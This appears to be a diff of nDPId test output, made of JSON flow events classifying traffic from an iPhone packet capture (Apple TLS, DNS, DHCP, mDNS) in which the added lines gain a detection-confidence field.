+00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00948{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454595839,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":264,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00606{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585625,"flow_last_seen":1582454585625,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598246,"flow_last_seen":1582454598287,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":51007,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"ConnCheck"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454599396,"flow_last_seen":1582454600443,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4485,"flow_avg_l4_payload_len":373,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.137.166.35","src_port":50585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63377,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598204,"flow_last_seen":1582454598247,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63381,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1186,"flow_tot_l4_payload_len":1955,"flow_avg_l4_payload_len":488,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454598888,"flow_last_seen":1582454599079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7015,"flow_avg_l4_payload_len":501,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"104.73.61.30","src_port":50583,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1582454598885,"flow_last_seen":1582454599226,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
